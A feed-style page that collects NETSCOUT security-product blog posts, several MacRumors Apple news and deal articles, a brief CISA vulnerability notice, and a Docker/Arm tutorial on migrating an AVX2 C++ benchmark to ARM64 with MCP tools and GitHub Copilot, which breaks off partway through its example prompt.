This is where visibility breaks down. This is where attacks hide. This is where risk grows quietly. NETSCOUT’s Omnis Cyber Intelligence closes this critical gap with a simple yet powerful idea: If you can’t see every signal, you can’t trust any conclusion.
Turning packets into understanding
Our proprietary Adaptive Service Intelligence (ASI) technology doesn’t just collect packets; it interprets them through patented deep packet inspection (DPI) capabilities that operate at scale. At up to 100 Gbps, ASI transforms raw traffic into enriched Layer 2–7 metadata that reveals behavior, intent, and impact with a level of precision that flow-based tools simply can’t match.
Machine learning, signatures, threat intelligence, and behavioral analytics all become more effective when powered by truth at the packet level. The result? Fewer false positives, deeper context, stronger investigations, and faster answers.
Visibility becomes clarity. Clarity becomes confidence. Confidence becomes resilience.
Forensics that tell the full story, not just the ending
A security event is never just a single moment; it is a sequence, one that can start long before an alert fires, especially in a zero-day threat scenario.
NETSCOUT’s continuous packet capture provides stored history that is independent of detection, so teams can explore that sequence from its earliest footprint to its last, to truly understand what happened before the alert. This empowers analysts to not just understand what happened but also to reconstruct, retrace, and re-imagine the incident with complete fidelity.
In an era where attackers live off the land, pivot silently, and operate in encrypted channels, this kind of longitudinal visibility isn’t optional; it’s essential.
A borderless approach to modern visibility
Hybrid cloud. Remote work. Containerization. Encryption. Operational technology (OT) and Internet of Things (IoT) sprawl. The perimeter hasn’t just dissolved; it has dissolved everywhere at once.
That’s why NETSCOUT champions Visibility Without Borders, ensuring every corner of the network (physical, virtual, or cloud-based) speaks the same language of packet-level truth. Whether it’s east-west traffic in a data center or encrypted communication from a remote site, the story remains intact and readable. Where other tools stop at infrastructure boundaries, NETSCOUT keeps going.
The future favors the fully informed
As networks evolve, attackers adapt. As security stacks expand, complexity grows. But the organizations that win will be the ones that can see clearly, connect the dots instantly, and understand their environments deeply enough to act decisively.
That future belongs to those with true visibility—the kind only NETSCOUT can deliver.
Leadership in NDR isn’t just something we’ve earned; it’s something we’ve engineered through decades of innovation, relentless focus on packet intelligence, and a commitment to helping organizations see what others can’t.
And we’re just getting started. Read the report here. 
Learn more about Omnis Cyber Intelligence.

View the full article
In today’s digital landscape, encrypted traffic is the norm—not the exception. While encryption such as Transport Layer Security (TLS) 1.3 protects user privacy and data integrity, it also presents a growing challenge for security teams: How do you defend against threats hidden inside encrypted traffic without overwhelming your systems?
The challenge of encrypted DDoS attacks
Threat actors are always looking for ways to circumvent modern defenses, and one of the most popular distributed denial-of-service (DDoS) attack methods is to hide the attacks in what looks like ordinary traffic. Enormous amounts of internet traffic now rely on Hypertext Transfer Protocol Secure (HTTPS). Since decrypting TLS 1.3 traffic typically requires proxy-based solutions—which are resource-intensive—many security products struggle to inspect encrypted sessions effectively. This blind spot makes encrypted DDoS attacks harder to detect and mitigate.
Block first, ask questions later
One way to minimize the impact of encrypted attack traffic is to simply drop it before decrypting. There are several methods we employ to filter out the garbage quickly and efficiently:
Known source blocking: Many attackers are now using open internet proxies to hide the source of their HTTPS attacks. We constantly track these sources, and our ATLAS Intelligence Feed (AIF)-powered countermeasure can block them automatically.
TLS attack prevention: This countermeasure looks at the TLS handshake (pre-encryption) and can block TLS sessions that don’t follow standard user behaviors.
TCP connection limiting: This countermeasure looks at TCP connection behavior from each source. Sources opening too many connections or engaging in abusive behaviors over TCP can be blocked.
Rate-based protections: Usually, attackers will be sending more traffic than legitimate users, and these protections can distinguish and block those sources automatically.
Selective decryption: This is used to decrypt and deal with more-advanced attacks, when encrypted traffic behavior mimics legitimate users.
Why full decryption isn’t always the answer
Decrypting all traffic isn’t practical. It’s computationally expensive and can quickly exhaust system resources. What’s needed is a smarter approach—one that focuses decryption efforts only where it’s truly necessary.
NETSCOUT’s solution: Selective decryption
NETSCOUT’s Arbor Edge Defense (AED) offers a powerful solution via selective decryption. Positioned at the network edge, AED intelligently decides which traffic to decrypt based on threat indicators and client validation.
Here’s how it works:
Intelligent decryption: As the traffic enters, AED identifies valid client traffic and passes it on without requiring decryption.
Suspicious traffic decryption: Only non-validated encrypted traffic is decrypted and analyzed for DDoS threats.
Customizable decryption: Users can enable decryption for specific protection groups or levels, allowing targeted inspection without wasting resources.
Benefits of selective decryption
Efficient resource use: Focuses decryption on suspicious traffic, preserving system performance

Scalable protection: Enables high-scale defense against encrypted threats without compromising throughput

Flexible configuration: Tailors decryption policies to match the needs of different services and threat levels
Conclusion
As encrypted traffic continues to grow, so does the need for smarter security solutions. NETSCOUT AED’s selective decryption approach empowers organizations to defend against encrypted DDoS attacks efficiently and effectively—without sacrificing performance.
  
Learn more about Arbor Edge Defense.

View the full article
This week saw a wide range of Apple-related deals, including some of the lowest prices we've seen in months on the Apple Studio Display, plus solid discounts on the M4 Mac mini, Mac-compatible monitors from Samsung, popular desktop accessories from Satechi, and even more.

Note: MacRumors is an affiliate partner with some of these vendors. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

Amazon Sale


What's the deal? Take up to $450 off popular accessories
Where can I get it? Amazon
Where can I find the original deal? Right here
$450 OFF: Ecovacs Deebot T80 Pro Robot Vacuum for $549.99
$350 OFF: Ecovacs Deebot X8 Pro Robot Vacuum for $749.00

Amazon this week has a few notable sales from popular brands like Ecovacs, Jackery, and Anker. These include discounts on everything from MagSafe-compatible chargers to portable power stations and robot vacuums.

Ecovacs Deebot X9 Pro Omni Robot Vacuum and Mop - $699.00, down from $799.00
Ecovacs Deebot X11 OmniCyclone Robot Vacuum and Mop - $1,099.00, down from $1,499.99
Anker MagGo UFO 3-in-1 Qi2 Charger - $61.98, down from $89.99
Anker 3-in-1 MagSafe-Compatible Charging Cube - $97.49, down from $149.95
Anker 14-Port Prime Docking Station - $169.99, down from $269.99
Anker SOLIX C300 Power Station with Lantern - $179.99, down from $249.00
Jackery Explorer 1000 V2 Portable Power Station - $399.00, down from $799.00
Jackery Explorer 1500 Portable Power Station - $898.99, down from $1,399.00

Apple Studio Display


What's the deal? Take up to $450 off Apple Studio Display
Where can I get it? Woot
Where can I find the original deal? Right here
UP TO $450 OFF: Apple Studio Display at Woot

Woot this week started a new Apple sale that includes some of the lowest prices we've tracked on the Studio Display in months. The items that we're focusing on in this sale are all in new condition and come with a one-year Apple limited warranty, but there are other items that are refurbished.

Prices on the 27-inch Studio Display start at $1,349.00 for the standard glass/VESA mount adapter, down from $1,599.00, and also include all of the nano-texture glass options. We haven't tracked deals on the Studio Display in quite a while, so these are solid markdowns for anyone who's been waiting for a sale.

Mac Mini


What's the deal? Take up to $130 off M4 Mac mini
Where can I get it? Amazon
Where can I find the original deal? Right here
$100 OFF: M4 Mac mini (256GB) for $499.00
$110 OFF: M4 Mac mini (16GB/512GB) for $689.00
$109 OFF: M4 Mac mini (24GB/512GB) for $889.99
$130 OFF: M4 Pro Mac mini (24GB/512GB) for $1,269.00

Amazon this week has a few models of Apple's M4 Mac mini on sale at low prices, starting at $499.99 for the model with 16GB RAM/256GB SSD, down from $599.00. Discounts reach up to $130 off in these sales, and this time around there is also a discount on the M4 Pro model.

Satechi


What's the deal? Take 20% off Satechi's new products
Where can I get it? Satechi
Where can I find the original deal? Right here
Note: Use code CES2026 to see this discount.
UP TO 20% OFF: Satechi's CES 2026 Sale
Note: Use code REFRESH20 to see this discount.
20% OFF: Satechi's Refresh 2026 Sale

Satechi announced a few products at CES this month, and to mark the launch it's providing a 20 percent discount on these devices for early adopters. You can use the code CES2026 at checkout to get 20 percent off all five of Satechi's newest products.

Additionally, Satechi recently kicked off a new sale that has its most popular desktop accessories at 20 percent off for a limited time. To get this discount, enter the code REFRESH20 at checkout on the accessories found in Satechi's "Desk Refresh Collection."

Samsung


What's the deal? Save on Samsung monitors and TVs
Where can I get it? Samsung
Where can I find the original deal? Right here
$300 OFF: 32-inch Smart Monitor M9 for $1,299.99
$600 OFF: 65-inch The Frame for $1,199.99
$1,200 OFF: 75-inch The Frame Pro for $1,999.99

Samsung recently introduced a sale across its most popular Vision AI-supported monitors and TVs, with notable markdowns on products like The Frame and the Smart Monitor series. These deals have all been applied automatically on Samsung's website, and many match all-time low prices on these products.

If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.







This article, "Best Apple Deals of the Week: Apple Studio Display Hits Lowest Prices in Months, Plus Accessory Discounts From Satechi and More" first appeared on MacRumors.com


View the full article
In an email to developers this week, Apple indicated that it will begin showing additional ads in App Store search results starting Tuesday, March 3.


The extra ads will first appear in the App Store in the U.K. and Japan, followed by other markets like the U.S. by the end of March, according to Apple.

Apple first announced that it would be expanding the number of ad slots in the App Store search results last month, but it had not provided an exact date for the change until now. Currently, developers can only pay to have an app appear in a single slot at the top of the search results, but Apple said there will now be multiple slots further down.

Apple shared more details on its website: The extra ad slots will be visible on iPhone and iPad devices running iOS 26.2 or iPadOS 26.2 and later. Apps with paid placement have an "Ad" label.

Ads are also shown in the App Store's "Today" tab, in a "You Might Also Like" section at the bottom of individual app listings, and in the search tab's "Suggested" section. Apple rebranded its "Search Ads" business as "Apple Ads" last year, as it reportedly prepares to begin showing ads in more places, such as Apple Maps.
Tags: App Store, Apple Ads
This article, "Apple to Show More Ads in App Store Starting in March" first appeared on MacRumors.com


View the full article
On this week's episode of The MacRumors Show, we discuss Apple's plan to turn Siri into a chatbot with iOS 27, alongside plans for new hardware such as an AI pin.


Apple reportedly plans to turn Siri into a chatbot that will rival Anthropic's Claude, Google's Gemini, and OpenAI's ChatGPT later this year. Apple's chatbot will apparently be able to search the web, generate content like images, help with coding, summarize information, and analyze uploaded files.

It will be able to leverage personal data on a user's device to complete tasks, and it will result in a much improved search feature. Apple is also said to be designing a feature that will let the ‌Siri‌ chatbot view open windows and on-screen content, as well as adjust device features and settings.

‌Siri‌ will integrate directly into all Apple apps, including Photos, Mail, Messages, Music, and TV, and it will be able to access and analyze content in the apps to respond to queries and requests. There will be voice and typed interface options.

Apple plans to power the chatbot with a custom model based on Google Gemini. It may even run on Google's servers. The ‌Siri‌ chatbot will purportedly be the key new feature in iOS 27, iPadOS 27, and macOS 27.

In related news, Apple is said to be working on a small, wearable AI pin equipped with standard and wide-angle cameras to capture photos and videos, a speaker, microphones, and a physical control button. The pin is said to be similar in size to an AirTag, with a thin, flat, circular disc shape and an aluminum and glass design.

This week also saw rumors that Apple's smart home hub device will tout a robotic swiveling base, with a heavy emphasis on AI features. It is expected to finally be released in the spring, following a heavily delayed launch.

The MacRumors Show has its own YouTube channel, so make sure you're subscribed to keep up with new episodes and clips.


You can also listen to ‌The MacRumors Show‌ on Apple Podcasts, Spotify, Overcast, or your preferred podcasts app. You can also copy our RSS feed directly into your podcast player.



If you haven't already listened to the previous episode of The MacRumors Show, catch up to hear our discussion about CES 2026, Apple Creator Studio, and the confirmation that Google Gemini will power the next-generation version of ‌Siri‌.

Subscribe to ‌The MacRumors Show‌ for new episodes every week, where we discuss some of the topical news breaking here on MacRumors, often joined by interesting guests such as Kayci Lacob, Kevin Nether, John Gruber, Mark Gurman, Jon Prosser, Luke Miani, Matthew Cassinelli, Brian Tong, Quinn Nelson, Jared Nelson, Eli Hodapp, Mike Bell, Sara Dietschy, iJustine, Jon Rettinger, Andru Edwards, Arnold Kim, Ben Sullins, Marcus Kane, Christopher Lawley, Frank McShan, David Lewis, Tyler Stalman, Sam Kohl, Federico Viticci, Thomas Frank, Jonathan Morrison, Ross Young, Ian Zelbo, and Rene Ritchie.

‌The MacRumors Show‌ is on X @MacRumorsShow, so be sure to give us a follow to keep up with the podcast. You can also head over to The MacRumors Show forum thread to engage with us directly. Remember to rate and review the podcast, and let us know what subjects and guests you would like to see in the future.
Tag: The MacRumors Show
This article, "The MacRumors Show: Apple's Upcoming Siri Chatbot and AI Pin" first appeared on MacRumors.com


View the full article
It has once again been rumored that Apple might revive its chipmaking partnership with Intel, but the chips would be designed by Apple rather than Intel.


In a research note today, obtained by MacRumors, GF Securities analyst Jeff Pu reiterated his expectation that Intel will begin supplying some Apple chips using its future 14A process, which is expected to be ready for mass production in 2028.

Last month, Pu said that he expected Intel to reach a chip supply deal with Apple for at least some non-pro iPhone models starting in 2028. Based on that timeframe, Intel could supply Apple with at least a portion of future A21 or A22 chips for iPhones, but TSMC is expected to remain Apple's primary chipmaking partner.

There is no indication that Intel would play a role in designing the iPhone chips, with its involvement expected to be strictly limited to fabrication. That would differ from the era of Intel Macs, which used Intel-designed processors with x86 architecture. Apple began transitioning away from Intel processors in Macs in 2020.

Intel also supplied Apple with cellular modems for some iPhone 7 to iPhone 11 models.

Apple's return to Intel might also involve some Mac and iPad chips. Last year, Tianfeng Securities analyst Ming-Chi Kuo said he expected Intel to begin shipping Apple's lowest-end M-series chip for select Mac and iPad models as early as mid-2027. For this, Kuo said Apple planned to utilize Intel's 18A process. He did not mention the iPhone.

Intel would help Apple to diversify its supply chain, which could come at a pivotal time, as Nvidia has reportedly surpassed Apple as TSMC's largest customer amid rising competition for chip supply for consumer devices and especially AI servers.
Tags: Intel, Jeff Pu
This article, "Apple Rumored to Partner With Intel on iPhone Chips" first appeared on MacRumors.com


View the full article
A new UK class action lawsuit against Apple seeks billions in damages by alleging that the company unlawfully restricted competition in contactless payments on the iPhone through Apple Pay, The Guardian reports.


The proposed opt-out collective action filed this week in the UK alleges that Apple abused its position in the market by limiting access to the ‌iPhone‌'s near-field communication (NFC) technology and charging fees to banks for the use of ‌Apple Pay‌. The claim seeks up to £1.5 billion (approximately $2 billion) in damages on behalf of an estimated 50 million UK consumers.

The complainant argues that ‌Apple Pay‌ has effectively been the only contactless mobile payment option available to ‌iPhone‌ users in the UK since its launch in 2015. According to the filing, Apple declined to grant third-party developers access to the ‌iPhone‌'s NFC hardware and Secure Element, preventing rival wallets from operating on equal terms and leaving banks and card issuers with no alternative but to participate in ‌Apple Pay‌ if they wished to offer mobile contactless payments to ‌iPhone‌ users.

The case heavily focuses on fees Apple reportedly charges issuing banks for ‌Apple Pay‌ transactions, commonly cited in industry reporting as approximately 0.15% of the transaction value in the UK. These fees are allegedly not consistent with industry norms and were only possible because Apple restricted competition on its platform. The suit further contends that banks passed the costs of those fees on to consumers through higher charges across a wide range of financial products, including current accounts, credit cards, savings accounts, and mortgages.

Around 98% of UK consumers hold accounts with banks that support ‌Apple Pay‌ and were therefore exposed to higher costs regardless of whether they personally used the service. On that basis, the claim seeks damages on a population-wide basis. The average payout per affected consumer would be relatively modest, estimated at roughly £26 to £35 if the claim were successful.

In a statement, Apple said that the lawsuit was "misguided and should be dismissed," adding:



Apple also emphasized changes to its platform that have occurred since the period covered by the claim. The company said it has recently expanded access to key technologies, including NFC and the Secure Element, allowing third-party developers to offer contactless payments within their own apps in the UK.

The claim has been lodged with the Competition Appeal Tribunal, which must determine whether the case can proceed as a collective action.
Tags: Apple Antitrust, Apple Pay, NFC, United Kingdom
This article, "Apple Raised UK Banking Costs, Lawsuit Alleges" first appeared on MacRumors.com


View the full article
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added four security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The list of vulnerabilities is as follows - CVE-2025-68645 (CVSS score: 8.8) - A PHP remote file inclusion vulnerability in Synacor Zimbra Collaboration Suite (ZCS) that could allow a
View the full article
Best Buy today has a match of the record low price on the AirPods Pro 3, available for $199.99, down from $249.00. This is only the second time in 2026 that we've tracked the AirPods Pro 3 at this low price, which matches the best deal we saw over the holiday season. This is a flash sale and it will end later tonight, so those interested should shop soon.

Note: MacRumors is an affiliate partner with some of these vendors. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

This model of the AirPods Pro launched in September 2025 and has 2x better Active Noise Cancellation than the previous generation, better audio quality, a revised fit that's meant to improve comfort and stability, Live Translation for in-person conversations, and heart rate sensing for workouts.

$49 OFF: AirPods Pro 3 for $199.99

Keep up with all of this week's best discounts on Apple products and related accessories in our dedicated Apple Deals roundup.







This article, "AirPods Pro 3 Drop to All-Time Low Price of $199.99" first appeared on MacRumors.com


View the full article
This post is a collaboration between Docker and Arm, demonstrating how Docker MCP Toolkit and the Arm MCP Server work together to simplify architecture migrations.
Moving workloads from x86 to ARM64 architecture has become increasingly important as organizations seek to reduce cloud costs and improve performance. AWS Graviton, Azure Cobalt, and Google Cloud Axion have made Arm-based computing mainstream, promising 20-40% cost savings and better performance for many workloads.
But here’s the challenge: How do you migrate your applications to Arm without breaking things?
Traditional migration approaches require:
Manual code analysis for x86-specific dependencies
Tedious compatibility checks across multiple tools
Manual performance evaluation
What if you could orchestrate the entire Arm migration workflow from a single interface? Docker MCP Toolkit makes this possible.
By connecting specialized Arm migration tools directly to GitHub Copilot, you can automate compatibility analysis, intrinsic conversion, and performance prediction—all through natural conversation in VS Code.
Here’s what that looks like in practice: You ask GitHub Copilot to migrate your legacy C++ application to ARM64. Copilot doesn’t just tell you what needs changing—it actually executes: scanning your code for x86 intrinsics, converting x86 SIMD intrinsics to Arm SIMD intrinsics, updating your Dockerfile, predicting Arm performance improvements, and creating a pull request with all changes. All through natural conversation in VS Code. No manual porting. No up-front architecture expertise required.
If you have questions about any step in the process, you can directly ask Copilot, which will invoke the Arm MCP Server knowledge base tool. The knowledge base has information pulled directly from all Learning Paths on learn.arm.com, as well as knowledge of all Arm intrinsics, and will both summarize that information for you as well as provide links to the concrete documentation that you can peruse yourself. 
Now you might ask – “Can’t I just rebuild my Docker image for ARM64?” True, for most applications. But when you hit that one legacy app with hand-optimized x86 assembly, AVX2 intrinsics, or architecture-specific compiler flags? That’s when Docker MCP Toolkit with the Arm MCP Server becomes essential.
By the end of this guide, you’ll migrate a real-world legacy application—a matrix multiplication benchmark written with AVX2 intrinsics for x86—to ARM64 automatically using GitHub Copilot and Docker MCP Toolkit.
What normally takes 5-7 hours of manual work will take you about 25 to 30 minutes.
The Arm Migration Challenge
Let me show you exactly what we’re solving. Consider a matrix multiplication benchmark originally written for x86-64 with AVX2 optimizations—the kind of code that makes Arm migration painful.
Here’s a Dockerfile that will cause problems when trying to migrate to Graviton:
FROM centos:6

# CentOS 6 reached EOL, need to use vault mirrors
RUN sed -i 's|^mirrorlist=|#mirrorlist=|g' /etc/yum.repos.d/CentOS-Base.repo && \
    sed -i 's|^#baseurl=http://mirror.centos.org|baseurl=http://vault.centos.org|g' /etc/yum.repos.d/CentOS-Base.repo

# Install EPEL repository (required for some development tools)
RUN yum install -y epel-release && \
    sed -i 's|^mirrorlist=|#mirrorlist=|g' /etc/yum.repos.d/epel.repo && \
    sed -i 's|^#baseurl=http://download.fedoraproject.org/pub/epel|baseurl=http://archives.fedoraproject.org/pub/archive/epel|g' /etc/yum.repos.d/epel.repo

# Install Developer Toolset 2 for better C++11 support (GCC 4.8)
RUN yum install -y centos-release-scl && \
    sed -i 's|^mirrorlist=|#mirrorlist=|g' /etc/yum.repos.d/CentOS-SCLo-scl.repo && \
    sed -i 's|^mirrorlist=|#mirrorlist=|g' /etc/yum.repos.d/CentOS-SCLo-scl-rh.repo && \
    sed -i 's|^# baseurl=http://mirror.centos.org|baseurl=http://vault.centos.org|g' /etc/yum.repos.d/CentOS-SCLo-scl.repo && \
    sed -i 's|^# baseurl=http://mirror.centos.org|baseurl=http://vault.centos.org|g' /etc/yum.repos.d/CentOS-SCLo-scl-rh.repo

# Install build tools
RUN yum install -y \
    devtoolset-2-gcc \
    devtoolset-2-gcc-c++ \
    devtoolset-2-binutils \
    make \
    && yum clean all

WORKDIR /app
COPY *.h *.cpp ./

# AVX2 intrinsics are used in the code
RUN scl enable devtoolset-2 "g++ -O2 -mavx2 -o benchmark \
    main.cpp \
    matrix_operations.cpp \
    -std=c++11"

CMD ["./benchmark"]

Now you might ask: why won’t this work on Arm? Looking at this Dockerfile, there are two immediate blockers for Graviton migration:
No ARM64 support in base image – The centos:6 image was built for x86 only, so this container won’t even start on Arm hardware.
x86-specific compiler flag – The -mavx2 flag tells the compiler to use AVX2 vector instructions, which don’t exist on Arm processors.
Even experienced developers miss these issues in larger codebases.
The source code uses AVX2 intrinsics for vectorized operations:
#include "matrix_operations.h"
#include <iostream>
#include <random>
#include <chrono>
#include <stdexcept>
#include <immintrin.h>  // AVX2 intrinsics

Matrix::Matrix(size_t r, size_t c) : rows(r), cols(c) {
    data.resize(rows, std::vector<double>(cols, 0.0));
}

void Matrix::randomize() {
    std::random_device rd;
    std::mt19937 gen(rd());
    std::uniform_real_distribution<> dis(0.0, 10.0);
    for (size_t i = 0; i < rows; i++) {
        for (size_t j = 0; j < cols; j++) {
            data[i][j] = dis(gen);
        }
    }
}

Matrix Matrix::multiply(const Matrix& other) const {
    if (cols != other.rows) {
        throw std::runtime_error("Invalid matrix dimensions for multiplication");
    }
    Matrix result(rows, other.cols);

    // x86-64 optimized using AVX2 for double-precision
    for (size_t i = 0; i < rows; i++) {
        for (size_t j = 0; j < other.cols; j++) {
            __m256d sum_vec = _mm256_setzero_pd();
            size_t k = 0;

            // Process 4 elements at a time with AVX2
            for (; k + 3 < cols; k += 4) {
                __m256d a_vec = _mm256_loadu_pd(&data[i][k]);
                __m256d b_vec = _mm256_set_pd(
                    other.data[k+3][j],
                    other.data[k+2][j],
                    other.data[k+1][j],
                    other.data[k][j]
                );
                sum_vec = _mm256_add_pd(sum_vec, _mm256_mul_pd(a_vec, b_vec));
            }

            // Horizontal add using AVX
            __m128d sum_high = _mm256_extractf128_pd(sum_vec, 1);
            __m128d sum_low = _mm256_castpd256_pd128(sum_vec);
            __m128d sum_128 = _mm_add_pd(sum_low, sum_high);
            double sum_arr[2];
            _mm_storeu_pd(sum_arr, sum_128);
            double sum = sum_arr[0] + sum_arr[1];

            // Handle remaining elements
            for (; k < cols; k++) {
                sum += data[i][k] * other.data[k][j];
            }

            result.data[i][j] = sum;
        }
    }
    return result;
}

double Matrix::sum() const {
    double total = 0.0;
    for (size_t i = 0; i < rows; i++) {
        for (size_t j = 0; j < cols; j++) {
            total += data[i][j];
        }
    }
    return total;
}

void benchmark_matrix_ops() {
    std::cout << "\n=== Matrix Multiplication Benchmark ===" << std::endl;
    const size_t size = 200;
    Matrix a(size, size);
    Matrix b(size, size);
    a.randomize();
    b.randomize();

    auto start = std::chrono::high_resolution_clock::now();
    Matrix c = a.multiply(b);
    auto end = std::chrono::high_resolution_clock::now();
    auto duration = std::chrono::duration_cast<std::chrono::milliseconds>(end - start);

    std::cout << "Matrix size: " << size << "x" << size << std::endl;
    std::cout << "Time: " << duration.count() << " ms" << std::endl;
    std::cout << "Result sum: " << c.sum() << std::endl;
}

Looking at this code, you can see that it is heavily optimized for Intel/AMD x86 processors and won’t work on Arm.
x86-exclusive header – #include <immintrin.h> only exists on x86 systems. Arm uses <arm_neon.h> instead.
AVX2 intrinsics throughout – Every _mm256_* function is Intel-specific:
  _mm256_setzero_pd() – Creates a 256-bit zero vector (Arm NEON is 128-bit)
  _mm256_loadu_pd() – Loads 4 doubles at once (NEON loads 2)
  _mm256_set_pd() – Sets 4 doubles (no direct NEON equivalent)
  _mm256_add_pd() / _mm256_mul_pd() – 256-bit operations (NEON uses 128-bit)
  _mm256_extractf128_pd() – Extracts high 128 bits (not needed on NEON)
Vector width mismatch – AVX2 processes 4 doubles per operation, while Arm NEON processes 2. The entire loop structure needs adjustment. (SVE/SVE2 on newer Arm cores (Neoverse V1/V2, Graviton 3/4) provides 256-bit or wider vector-length agnostic (VLA) registers, matching or exceeding AVX2 registers.)
Horizontal reduction logic – The horizontal add pattern using _mm256_extractf128_pd and _mm256_castpd256_pd128 is x86-specific and must be completely rewritten for Arm SIMD.
Manual conversion requires rewriting 30+ lines of intrinsic code, adjusting loop strides, and testing numerical accuracy. This is exactly where automated migration tools become essential.
Each of these issues blocks Arm migration in different ways. Manual migration requires not just converting intrinsics, but also modernizing the entire build infrastructure, finding Arm equivalents, and validating performance. For any substantial codebase, this becomes prohibitively expensive.
What GitHub Copilot Can and Can’t Do Without Arm MCP
Let’s be clear about what changes when you add the Arm MCP Server to Docker MCP Toolkit.
Without Arm MCP
You ask GitHub Copilot to migrate your C++ application from x86 to ARM64. Copilot responds with general advice: “Convert AVX2 intrinsics to NEON”, “Update your Dockerfile to use ARM64 base image”, “Change compiler flags”. Then you must manually research NEON equivalents, rewrite hundreds of lines of intrinsic code, update the Dockerfile yourself, hope you got the conversion right, and spend hours debugging compilation errors.
Yes, Copilot can write code. But without specialized tools, it’s guessing based on training data—not drawing on concrete knowledge-base documentation or on purpose-built tools that analyze your actual application architecture.
With Arm MCP + Docker MCP Toolkit
You ask GitHub Copilot the same thing. Within minutes, it:
Uses the check_image tool to verify your base image supports ARM64
Runs migrate_ease_scan on your actual codebase to find x86-specific code
Uses knowledge_base_search to find correct Arm SIMD equivalents for every x86 intrinsic
Converts your code with architecture-specific accuracy
Updates your Dockerfile with Arm-compatible base images
Creates a pull request with all changes

Real code gets scanned. Real intrinsics get converted. Real pull requests appear in your repository. Close VS Code, come back tomorrow, and the migration is ready to test, complete with documentation explaining every change.
The difference? Docker MCP Toolkit gives GitHub Copilot access to actual Arm migration tooling, not just general knowledge about Arm architecture.
Why This Is Different from Manual Migration
You could manually use Arm migration tools: install utilities locally, run checks, research intrinsics, update code. Here’s what that process looks like:
Manual process:
Install Arm migration tools (15 minutes)
Run compatibility scans (5 minutes)
Research each x86 intrinsic equivalent (30 minutes per intrinsic)
Manually rewrite code (2-3 hours)
Update Dockerfile (15 minutes)
Fix compilation errors (1-2 hours)
Document changes (30 minutes)
Total: 5-7 hours per application
With Docker MCP Toolkit + Arm MCP:
Ask GitHub Copilot to migrate (20 minutes)
Review and approve changes (10-20 minutes)
Merge pull request
Total: 30-40 minutes per application
Setting Up Visual Studio Code with Docker MCP Toolkit
Prerequisites
Before you begin, make sure you have:
A machine with 8 GB RAM minimum (16 GB recommended)
The latest Docker Desktop release
VS Code with GitHub Copilot extension
GitHub account with personal access token

Step 1. Enable Docker MCP Toolkit
Open Docker Desktop and enable the MCP Toolkit from Settings.
To enable:
Open Docker Desktop
Go to Settings → Beta Features
Toggle Docker MCP Toolkit ON
Click Apply
Caption: Enabling Docker MCP Toolkit under Docker Desktop 
Add Required MCP Servers from Catalog
Add Arm, Sequential Thinking and GitHub Official by following the links below, or by selecting “Catalog” in the Docker Desktop MCP toolkit:
Arm MCP Server – Arm migration tools and architecture expertise
GitHub MCP Server – Repository operations and pull request management
Sequential Thinking MCP Server – Complex problem decomposition and planning

Caption: Searching for Arm MCP Server in the Docker MCP Catalog
Step 2. Configure the Servers
Configure the Arm MCP Server

To access your local code for the migrate-ease scan and MCA tools, the Arm MCP Server needs a directory configured to point to your local code.
Caption: Arm MCP Server configuration
Once you click ‘Save’, the Arm MCP Server will know where to look for your code. If you want to give a different directory access in the future, you’ll need to change this path.
Available Arm Migration Tools
Click Tools to view all six MCP tools available under the Arm MCP Server.
Caption: List of MCP tools provided by the Arm MCP Server
knowledge_base_search – Semantic search of Arm learning resources, intrinsics documentation, and software compatibility
migrate_ease_scan – Code scanner supporting C++, Python, Go, JavaScript, and Java for Arm compatibility analysis
check_image – Docker image architecture verification (checks if images support ARM64)
skopeo – Remote container image inspection without downloading
mca – Machine Code Analyzer for assembly performance analysis and IPC predictions
sysreport_instructions – System architecture information gathering
Configure GitHub MCP Server

The GitHub MCP Server lets GitHub Copilot create pull requests, manage issues, and commit changes.
Caption: Steps to configure GitHub Official MCP Server
Configure Authentication:
Select GitHub official
Choose your preferred authentication method
For Personal Access Token, you’ll need to get the token from GitHub > Settings > Developer Settings

Caption: Setting up Personal Access Token in GitHub MCP Server
Configure Sequential Thinking MCP Server

Click “Sequential Thinking”
No configuration needed

Caption: Sequential MCP Server requires zero configuration
This server helps GitHub Copilot break down complex Arm migration decisions into logical steps.
Step 3. Add the Servers to VS Code
The Docker MCP Toolkit makes it incredibly easy to configure MCP servers for clients like VS Code.
To configure, click “Clients” and scroll down to Visual Studio Code. Click the “Connect” button:
Caption: Setting up Visual Studio Code as MCP Client
Now open VS Code and click on the ‘Extensions’ icon in the left toolbar:
Caption: Configuring MCP_DOCKER under VS Code Extensions
Click the MCP_DOCKER gear, and click ‘Start Server’:
Caption: Starting MCP Server under VS Code
Now you’re ready to perform an Arm migration!
Step 4. Verify Connection
Open GitHub Copilot Chat in VS Code and ask:
What Arm migration tools do you have access to?

You should see tools from all three servers listed. If you see them, your connection works. Let’s migrate some code.
Caption: Playing around with GitHub Co-Pilot
Real-World Demo: Migrating a Legacy x86 Application
Now that you’ve connected GitHub Copilot to Docker MCP Toolkit, let’s migrate that matrix multiplication benchmark we looked at earlier.
Time to migrate: 20 minutes
Infrastructure: $0 (all runs in Docker containers)
Prerequisites: The code we showed earlier in this post
The Workflow
Docker MCP Toolkit orchestrates the migration through a secure MCP Gateway that routes requests to specialized tools: the Arm MCP Server scans code and converts intrinsics, GitHub MCP Server creates pull requests, and Sequential Thinking plans multi-step migrations. Each tool runs in an isolated Docker container: secure, reproducible, and under your control.
Step 1. Clone the repo
git clone https://github.com/JoeStech/docker-blog-arm-migration

Give GitHub Copilot Migration Instructions
Open your project in VS Code. In GitHub Copilot Chat, paste this prompt:
Your goal is to migrate this codebase from x86 to ARM64. Use the Arm MCP Server tools to help you with this migration.

Steps to follow:
1. Check all Dockerfiles - use check_image and/or skopeo tools to verify Arm compatibility, changing the base image if necessary
2. Scan the codebase - run migrate_ease_scan with the appropriate language scanner and apply the suggested changes
3. Use knowledge_base_search when you need Arm architecture guidance or intrinsic equivalents
4. Update compiler flags and dependencies for ARM64 compatibility
5. **Create a pull request with all changes using GitHub MCP Server**

Important notes:
- Your current working directory is mapped to /workspace on the MCP server
- NEON lane indices must be compile-time constants, not variables
- If you're unsure about Arm equivalents, use knowledge_base_search to find documentation
- Be sure to find out from the user or system what the target machine is, and use the appropriate intrinsics. For instance, if neoverse (Graviton, Axion, Cobalt) is targeted, use the latest SME/SME2.

**After completing the migration:**
- Create a pull request with a detailed description of changes
